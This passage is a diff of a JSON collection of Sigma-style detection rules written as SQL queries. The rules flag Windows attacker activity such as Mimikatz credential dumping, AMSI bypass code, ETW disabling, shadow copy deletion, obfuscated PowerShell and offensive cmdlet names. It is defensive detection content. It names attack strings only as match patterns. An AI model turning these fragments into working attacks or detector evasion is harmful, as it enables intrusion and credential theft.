'\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such 
as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') 
OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE 
'%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND 
ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - 
"title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to 
sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. 
They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE 
'%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 
'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE 